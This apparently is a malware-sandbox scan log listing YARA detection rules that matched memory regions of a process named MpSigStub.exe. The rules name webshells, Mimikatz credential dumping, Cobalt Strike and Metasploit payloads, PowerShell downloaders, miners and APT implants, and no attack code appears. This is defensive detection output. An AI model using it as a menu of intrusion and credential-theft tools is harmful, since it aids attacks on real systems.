Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6332385174.00000197A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6354837161.00000197A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
